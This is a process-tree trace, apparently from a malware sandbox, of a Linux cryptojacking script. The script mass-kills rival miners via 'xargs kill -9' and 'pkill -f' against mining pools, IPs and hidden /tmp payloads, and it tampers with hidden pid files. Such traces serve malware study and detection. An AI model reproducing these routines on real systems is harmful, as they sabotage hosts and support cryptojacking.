/bin/grepgrep :55552⤵PID:1647
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1657
-
-
/bin/grepgrep -v -2⤵PID:1656
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1655
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1654
-
-
/bin/grepgrep :66662⤵PID:1653
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1660
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1661
-
-
/bin/grepgrep :66652⤵PID:1659
-
-
/bin/grepgrep -v -2⤵PID:1662
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1663
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1669
-
-
/bin/grepgrep -v -2⤵PID:1668
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1667
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1666
-
-
/bin/grepgrep :66672⤵PID:1665
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1675
-
-
/bin/grepgrep -v -2⤵PID:1674
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1673
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1672
-
-
/bin/grepgrep :77772⤵PID:1671
-
-
/bin/grepgrep -v -2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1681
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1679
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1678
-
-
/bin/grepgrep :84442⤵PID:1677
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1687
-
-
/bin/grepgrep -v -2⤵PID:1686
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1685
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1684
-
-
/bin/grepgrep :33472⤵PID:1683
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1693
-
-
/bin/grepgrep -v -2⤵PID:1692
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1691
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1690
-
-
/bin/grepgrep :144442⤵PID:1689
-
-
/bin/grepgrep -v -2⤵PID:1698
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1699
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1697
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1696
-
-
/bin/grepgrep :144332⤵PID:1695
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1705
-
-
/bin/grepgrep -v -2⤵PID:1704
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1703
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1702
-
-
/bin/grepgrep :135312⤵PID:1701
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1706
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1708
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1707
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵PID:1709
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1711
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1710
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1712
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1714
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1713
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵PID:1715
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1717
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1716
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵PID:1718
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1720
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1719
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵PID:1721
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1723
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1722
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1724
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1725
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1726
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵PID:1727
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1729
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1728
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1730
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1732
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1731
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵PID:1733
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1735
-
-
/bin/catcat /data/./oka.pid2⤵PID:1734
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵PID:1736
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵PID:1737
-
-
/usr/bin/pkillpkill -f p84442⤵PID:1738
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1739
-
-
/usr/bin/pkillpkill -f monero2⤵PID:1740
-
-
/usr/bin/pkillpkill -f zsvc2⤵PID:1741
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵PID:1742
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵PID:1743
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads runtime system information
PID:1744
-
-
/usr/bin/pkillpkill -f dbused2⤵PID:1745
-
-
/usr/bin/pkillpkill -f bashirc2⤵PID:1746
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵PID:1747
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads runtime system information
PID:1748
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1749
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵PID:1750
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1751
-
-
/usr/bin/pkillpkill -f .syna2⤵PID:1752
-
-
/usr/bin/pkillpkill -f .main2⤵PID:1753
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1754
-
-
/usr/bin/pkillpkill -f solr.sh2⤵PID:1755
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵PID:1756
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵PID:1757
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵PID:1758
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1759
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵PID:1760
-
-
/usr/bin/pkillpkill -f c3pool2⤵PID:1761
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads runtime system information
PID:1762
-
-
/usr/bin/pkillpkill -f /tmp/12⤵PID:1763
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵PID:1764
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵PID:1765
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1766
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵PID:1767
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵PID:1768
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵PID:1769
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1774
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1773
-
-
/bin/grepgrep -v grep2⤵PID:1772
-
-
/bin/grepgrep ./udp2⤵PID:1771
-
-
/bin/psps aux2⤵PID:1770
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1779
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1778
-
-
/bin/grepgrep -v grep2⤵PID:1777
-
-
/bin/grepgrep ./oka2⤵PID:1776
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1775
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1784
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1783
-
-
/bin/grepgrep -v grep2⤵PID:1782
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1781
-
-
/bin/psps aux2⤵PID:1780
-
-
/bin/grepgrep -v "("2⤵PID:1789
-
-
/bin/grepgrep -v php-fpm2⤵PID:1790
-
-
/bin/grepgrep -v "\\["2⤵PID:1788
-
-
/bin/grepgrep -v proxymap2⤵PID:1791
-
-
/bin/grepgrep -v bin2⤵PID:1787
-
-
/bin/grepgrep -v postgres2⤵PID:1792
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1786
-
-
/bin/grepgrep -v postgrey2⤵PID:1793
-
-
/bin/grepgrep -v kinsing2⤵PID:1794
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1785
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1795
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1796
-
-
/bin/grepgrep -v "("2⤵PID:1801
-
-
/bin/grepgrep -v php-fpm2⤵PID:1802
-
-
/bin/grepgrep -v "\\["2⤵PID:1800
-
-
/bin/grepgrep -v proxymap2⤵PID:1803
-
-
/bin/grepgrep -v bin2⤵PID:1799
-
-
/bin/grepgrep -v postgres2⤵PID:1804
-
-
/bin/grepgrep -v postgrey2⤵PID:1805
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1798
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1806
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads runtime system information
PID:1797
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1807
-
-
/bin/grepgrep -v "("2⤵PID:1812
-
-
/bin/grepgrep -v "\\["2⤵PID:1811
-
-
/bin/grepgrep -v php-fpm2⤵PID:1813
-
-
/bin/grepgrep -v bin2⤵PID:1810
-
-
/bin/grepgrep -v proxymap2⤵PID:1814
-
-
/bin/grepgrep -v postgres2⤵PID:1815
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1809
-
-
/bin/grepgrep -v postgrey2⤵PID:1816
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1817
-
-
/bin/psps ax2⤵PID:1808
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1818
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1823
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1822
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1821
-
-
/bin/grepgrep -v grep2⤵PID:1820
-
-
/bin/psps aux2⤵PID:1819
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1828
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1827
-
-
/bin/grepgrep -v grep2⤵PID:1826
-
-
/bin/grepgrep "sleep 60"2⤵PID:1825
-
-
/bin/psps aux2⤵PID:1824
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1833
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1832
-
-
/bin/grepgrep -v grep2⤵PID:1831
-
-
/bin/grepgrep ./crun2⤵PID:1830
-
-
/bin/psps aux2⤵PID:1829
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1838
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1837
-
-
/bin/grepgrep -v grep2⤵PID:1836
-
-
/bin/grepgrep -vw kdevtmpfsi2⤵PID:1835
-
-
/bin/psps aux2⤵PID:1834
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1843
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1842
-
-
/bin/grepgrep :33332⤵PID:1841
-
-
/bin/grepgrep -v grep2⤵PID:1840
-
-
/bin/psps aux2⤵PID:1839
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1848
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1847
-
-
/bin/grepgrep :55552⤵PID:1846
-
-
/bin/grepgrep -v grep2⤵PID:1845
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1844
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1853
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1852
-
-
/bin/grepgrep "kworker -c\\"2⤵PID:1851
-
-
/bin/grepgrep -v grep2⤵PID:1850
-
-
/bin/psps aux2⤵PID:1849
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1858
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1857
-
-
/bin/grepgrep log_2⤵PID:1856
-
-
/bin/grepgrep -v grep2⤵PID:1855
-
-
/bin/psps aux2⤵PID:1854
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1863
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1862
-
-
/bin/grepgrep systemten2⤵PID:1861
-
-
/bin/grepgrep -v grep2⤵PID:1860
-
-
/bin/psps aux2⤵PID:1859
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1868
-
/usr/local/sbin/killkill -9 103⤵PID:1869
-
-
/usr/local/bin/killkill -9 103⤵PID:1869
-
-
/usr/sbin/killkill -9 103⤵PID:1869
-
-
/usr/bin/killkill -9 103⤵PID:1869
-
-
/sbin/killkill -9 103⤵PID:1869
-
-
/bin/killkill -9 103⤵PID:1869
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1867
-
-
/bin/grepgrep netns2⤵PID:1866
-
-
/bin/grepgrep -v grep2⤵PID:1865
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1864
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1874
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1873
-
-
/bin/grepgrep voltuned2⤵PID:1872
-
-
/bin/grepgrep -v grep2⤵PID:1871
-
-
/bin/psps aux2⤵PID:1870
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1879
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1878
-
-
/bin/grepgrep darwin2⤵PID:1877
-
-
/bin/grepgrep -v grep2⤵PID:1876
-
-
/bin/psps aux2⤵PID:1875
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1884
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1883
-
-
/bin/grepgrep /tmp/dl2⤵PID:1882
-
-
/bin/grepgrep -v grep2⤵PID:1881
-
-
/bin/psps aux2⤵PID:1880
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1889
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1888
-
-
/bin/grepgrep /tmp/ddg2⤵PID:1887
-
-
/bin/grepgrep -v grep2⤵PID:1886
-
-
/bin/psps aux2⤵PID:1885
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1894
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1893
-
-
/bin/grepgrep /tmp/pprt2⤵PID:1892
-
-
/bin/grepgrep -v grep2⤵PID:1891
-
-
/bin/psps aux2⤵PID:1890
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1899
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1898
-
-
/bin/grepgrep /tmp/ppol2⤵PID:1897
-
-
/bin/grepgrep -v grep2⤵PID:1896
-
-
/bin/psps aux2⤵PID:1895
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1904
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1903
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:1902
-
-
/bin/grepgrep -v grep2⤵PID:1901
-
-
/bin/psps aux2⤵PID:1900
-
-
/bin/psps aux2⤵PID:1905
-
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:1907
-
-
/bin/grepgrep -v grep2⤵PID:1906
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1908
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1909
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1914
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1913
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1912
-
-
/bin/grepgrep -v grep2⤵PID:1911
-
-
/bin/psps aux2⤵PID:1910
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1919
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1918
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1917
-
-
/bin/grepgrep -v grep2⤵PID:1916
-
-
/bin/psps aux2⤵PID:1915
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1924
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1923
-
-
/bin/grepgrep 45.76.122.922⤵PID:1922
-
-
/bin/grepgrep -v grep2⤵PID:1921
-
-
/bin/psps aux2⤵PID:1920
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1929
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1928
-
-
/bin/grepgrep 51.38.191.1782⤵PID:1927
-
-
/bin/grepgrep -v grep2⤵PID:1926
-
-
/bin/psps aux2⤵PID:1925
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1934
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1933
-
-
/bin/grepgrep 51.15.56.1612⤵PID:1932
-
-
/bin/grepgrep -v grep2⤵PID:1931
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1930
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1939
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1938
-
-
/bin/grepgrep 86s.jpg2⤵PID:1937
-
-
/bin/grepgrep -v grep2⤵PID:1936
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1935
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1944
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
-
-
/bin/grepgrep aGTSGJJp2⤵PID:1942
-
-
/bin/grepgrep -v grep2⤵PID:1941
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1940
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1949
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
-
-
/bin/grepgrep nMrfmnRa2⤵PID:1947
-
-
/bin/grepgrep -v grep2⤵PID:1946
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1945
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1954
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
-
-
/bin/grepgrep PuNY5tm22⤵PID:1952
-
-
/bin/grepgrep -v grep2⤵PID:1951
-
-
/bin/psps aux2⤵PID:1950
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1959
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
-
-
/bin/grepgrep I0r8Jyyt2⤵PID:1957
-
-
/bin/grepgrep -v grep2⤵PID:1956
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1955
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1964
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1963
-
-
/bin/grepgrep AgdgACUD2⤵PID:1962
-
-
/bin/grepgrep -v grep2⤵PID:1961
-
-
/bin/psps aux2⤵PID:1960
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1969
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1968
-
-
/bin/grepgrep uiZvwxG82⤵PID:1967
-
-
/bin/grepgrep -v grep2⤵PID:1966
-
-
/bin/psps aux2⤵PID:1965
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1974
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1973
-
-
/bin/grepgrep hahwNEdB2⤵PID:1972
-
-
/bin/grepgrep -v grep2⤵PID:1971
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1970
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
-
-
/bin/grepgrep BtwXn5qH2⤵PID:1977
-
-
/bin/grepgrep -v grep2⤵PID:1976
-
-
/bin/psps aux2⤵PID:1975
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
-
-
/bin/grepgrep 3XEzey2T2⤵PID:1982
-
-
/bin/grepgrep -v grep2⤵PID:1981
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1980
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1989
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
-
-
/bin/grepgrep t2tKrCSZ2⤵PID:1987
-
-
/bin/grepgrep -v grep2⤵PID:1986
-
-
/bin/psps aux2⤵PID:1985
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1994
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
-
-
/bin/grepgrep HD7fcBgg2⤵PID:1992
-
-
/bin/grepgrep -v grep2⤵PID:1991
-
-
/bin/psps aux2⤵PID:1990
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
-
-
/bin/grepgrep zXcDajSs2⤵PID:1997
-
-
/bin/grepgrep -v grep2⤵PID:1996
-
-
/bin/psps aux2⤵PID:1995
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2004
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
-
-
/bin/grepgrep 3lmigMo2⤵PID:2002
-
-
/bin/grepgrep -v grep2⤵PID:2001
-
-
/bin/psps aux2⤵PID:2000
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2009
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
-
-
/bin/grepgrep AkMK4A22⤵PID:2007
-
-
/bin/grepgrep -v grep2⤵PID:2006
-
-
/bin/psps aux2⤵PID:2005
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
-
-
/bin/grepgrep AJ2AkKe2⤵PID:2012
-
-
/bin/grepgrep -v grep2⤵PID:2011
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2010
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2019
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
-
-
/bin/grepgrep HiPxCJRS2⤵PID:2017
-
-
/bin/grepgrep -v grep2⤵PID:2016
-
-
/bin/psps aux2⤵PID:2015
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
-
-
/bin/grepgrep http_0xCC0302⤵PID:2022
-
-
/bin/grepgrep -v grep2⤵PID:2021
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2020
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2029
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2028
-
-
/bin/grepgrep http_0xCC0312⤵PID:2027
-
-
/bin/grepgrep -v grep2⤵PID:2026
-
-
/bin/psps aux2⤵PID:2025
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2034
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2033
-
-
/bin/grepgrep http_0xCC0322⤵PID:2032
-
-
/bin/grepgrep -v grep2⤵PID:2031
-
-
/bin/psps aux2⤵PID:2030
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2039
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2038
-
-
/bin/grepgrep http_0xCC0332⤵PID:2037
-
-
/bin/grepgrep -v grep2⤵PID:2036
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2035
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2044
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2043
-
-
/bin/grepgrep C4iLM4L2⤵PID:2042
-
-
/bin/grepgrep -v grep2⤵PID:2041
-
-
/bin/psps aux2⤵PID:2040
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2049
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2048
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵PID:2047
-
-
/bin/grepgrep -v grep2⤵PID:2046
-
-
/bin/psps aux2⤵PID:2045
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2053
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2052
-
-
/bin/grepgrep -v grep2⤵PID:2051
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2050
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2058
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2057
-
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2056
-
-
/bin/grepgrep -v grep2⤵PID:2055
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2054
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2063
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2062
-
-
/bin/grepgrep i4b503a52cc52⤵PID:2061
-
-
/bin/grepgrep -v grep2⤵PID:2060
-
-
/bin/psps aux2⤵PID:2059
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2068
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2067
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2066
-
-
/bin/grepgrep -v grep2⤵PID:2065
-
-
/bin/psps aux2⤵PID:2064
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2073
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2072
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2071
-
-
/bin/grepgrep -v grep2⤵PID:2070
-
-
/bin/psps aux2⤵PID:2069
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2078
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2077
-
-
/bin/grepgrep nqscheduler2⤵PID:2076
-
-
/bin/grepgrep -v grep2⤵PID:2075
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2074
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2083
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2082
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2081
-
-
/bin/grepgrep -v grep2⤵PID:2080
-
-
/bin/psps aux2⤵PID:2079
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2089
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2088
-
-
/bin/grepgrep "]"2⤵PID:2087
-
-
/bin/grepgrep -v aux2⤵PID:2086
-
-
/bin/grepgrep -v grep2⤵PID:2085
-
-
/bin/psps aux2⤵PID:2084
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2094
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2093
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2092
-
-
/bin/grepgrep -v grep2⤵PID:2091
-
-
/bin/psps aux2⤵PID:2090
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2099
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2098
-
-
/bin/grepgrep 0kwti6ut420t2⤵PID:2097
-
-
/bin/grepgrep -v grep2⤵PID:2096
-
-
/bin/psps aux2⤵PID:2095
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2104
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2103
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2102
-
-
/bin/grepgrep -v grep2⤵PID:2101
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2100
-
-
